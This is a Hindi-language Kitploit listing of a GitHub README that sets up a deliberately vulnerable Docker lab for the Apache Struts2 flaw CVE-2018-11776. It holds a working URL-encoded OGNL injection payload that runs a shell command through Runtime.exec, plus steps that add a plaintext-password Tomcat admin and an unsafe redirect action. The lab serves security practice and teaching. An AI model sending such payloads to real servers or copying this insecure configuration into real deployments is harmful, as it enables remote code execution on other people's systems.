Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-11776 — Vulnerable docker container for CVE-2018-11776 | Kitploit
उपकरण/GitHubGitHub/bhdresh/cve-2018-11776
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubbhdresh/cve-2018-11776

CVE-2018-11776

Vulnerable docker container for CVE-2018-11776

रिपॉजिटरी देखें
1277 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-11776 के लिए असुरक्षित डॉकर कंटेनर

root@kitploit:~
# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

प्रमाण-अवधारणा

प्रमाण-अवधारणा - 1
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
प्रमाण-अवधारणा - 2
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result  : इससे डॉकर के /tmp/ निर्देशिका में 'vulnerable' नामक फ़ाइल बनेगी

असुरक्षित डॉकर कंटेनर बनाने के कदम

Dockerfile बनाएँ
root@kitploit:~
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080
डॉकर बिल्ड करें
root@kitploit:~
# docker build -t cve-2018-11776 .
डॉकर शुरू करें
root@kitploit:~
# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
डॉकर में लॉगिन करें
root@kitploit:~
# docker exec -it cve-2018-11776 /bin/bash
डॉकर के अंदर निम्नलिखित बदलाव करें
Tomcat सेट अप करें:
root@kitploit:~
# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat
bashrc को चर के साथ अपडेट करें:
root@kitploit:~
# vim ~/.bashrc

export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat

# . ~/.bashrc
Tomcat GUI में एक व्यवस्थापक जोड़ें:
root@kitploit:~
# vim /opt/tomcat/conf/tomcat-users.xml

<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
Tomcat सर्वर शुरू करें
root@kitploit:~
# $CATALINA_HOME/bin/startup.sh
Tomcat UI के माध्यम से एक असुरक्षित Struts2 Showcase अपलोड और तैनात करें
root@kitploit:~
http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
Tomcat पुनरारंभ करें
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
नेमस्पेस के बिना एक असुरक्षित रीडायरेक्शन क्रिया जोड़ें:
root@kitploit:~
# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml

  <action name="help">
              <result type="redirectAction">
                      <param name="actionName">date.action</param>
              </result>
  </action>

नोट: डिफ़ॉल्ट रूप से, alwaysSelectFullNamespace को True पर सेट किया जाना चाहिए।
Tomcat पुनरारंभ करें और Struts2 Showcase पृष्ठ देखें:
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh

http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

लेखक

@bhdresh

संदर्भ

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057

टूल डाउनलोड करें